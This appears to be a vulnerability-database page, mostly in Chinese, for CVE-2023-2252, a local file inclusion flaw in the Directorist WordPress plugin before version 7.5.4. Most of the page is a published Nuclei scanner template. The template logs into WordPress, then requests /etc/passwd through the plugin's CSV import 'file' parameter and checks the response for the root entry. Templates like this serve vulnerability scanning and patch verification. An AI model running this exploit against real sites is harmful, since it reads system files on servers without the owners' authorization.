CVE-2023-2252: Directorist < 7.5.4 - Local File Inclusion

日期: 2025-08-01 | 影响软件: Directorist | POC: 已公开

漏洞描述

Directorist before 7.5.4 is susceptible to Local File Inclusion as it does not validate the file parameter when importing CSV files.

PoC代码[已公开]

id: CVE-2023-2252

info:
  name: Directorist < 7.5.4 - Local File Inclusion
  author: r3Y3r53
  severity: low
  description: |
    Directorist before 7.5.4 is susceptible to Local File Inclusion as it does not validate the file parameter when importing CSV files.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.
  remediation: Fixed in version 7.5.4
  reference:
    - https://wpscan.com/vulnerability/9da6eede-10d0-4609-8b97-4a5d38fa8e69
    - https://wordpress.org/plugins/directorist/advanced/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2252
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 2.7
    cve-id: CVE-2023-2252
    cwe-id: CWE-22
    epss-score: 0.11527
    epss-percentile: 0.93368
    cpe: cpe:2.3:a:wpwax:directorist:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: wpwax
    product: directorist
    framework: wordpress
  tags: cve2023,cve,wpscan,lfi,directorist,wordpress,wp-plugin,wp,authenticated,wpwax

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/edit.php?post_type=at_biz_dir&page=tools&step=2&file=%2Fetc%2Fpasswd&delimiter=%3B HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100902ddc84b31b378974e1bae37b5eb5f66a685a45f0e7c99515546b243f0d22970221008f18e4de04812db6fc64e74da43c06c864a7a1ab071f0a8895e21c9e9e8742ee:922c64590222798bb761d5b6d8e72950

相关漏洞推荐